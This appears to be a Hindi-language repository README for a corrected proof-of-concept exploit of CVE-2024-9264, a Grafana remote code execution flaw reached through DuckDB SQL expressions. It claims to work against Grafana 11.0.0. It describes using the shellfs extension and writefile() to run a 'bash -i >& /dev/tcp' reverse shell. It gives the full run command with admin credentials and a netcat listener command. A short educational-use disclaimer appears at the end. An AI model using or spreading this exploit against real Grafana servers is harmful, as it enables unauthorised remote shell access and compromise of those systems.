
CVE-2024-9264 के लिए निश्चित प्रूफ-ऑफ-कॉन्सेप्ट शोषण, DuckDB SQL एक्सप्रेशन के माध्यम से एक महत्वपूर्ण Grafana RCE। सही किए गए shellfs एक्सटेंशन और writefile() फ़ंक्शन का उपयोग करके रिवर्स शेल निष्पादित करता है।
यह CVE-2024-9264 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट का फिक्स्ड संस्करण है, जो Grafana में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता है (SQL एक्सप्रेशन और DuckDB के माध्यम से)।
🔗 मूल एडवाइज़री: Grafana Security Release
❌ मूल PoC: सिंटैक्स त्रुटियों और write_file() के गलत उपयोग के कारण टूटा हुआ
✅ यह संस्करण काम करता है, एक असुरक्षित Grafana 11.0.0 इंस्टेंस पर परीक्षण किया गया।
write_file() के बजाय writefile() (DuckDB फ़ंक्शन) का सही उपयोग करता हैbash -i >& /dev/tcp/... का उपयोग करके सही शेल पेलोडshellfs एक्सटेंशन के माध्यम से रिवर्स शेल सफलतापूर्वक लिखा और निष्पादित किया गयाinstall shellfs from community करने की क्षमताpython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
फिर लिसन करने के लिए:
nc -lvnp 4444
यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है।
इसे उन लक्ष्यों के विरुद्ध उपयोग न करें जिनका परीक्षण करने की आपके पास अनुमति नहीं है।
Exerr द्वारा संशोधित और मान्य किया गया — मूल PoC z3k0sec द्वारा।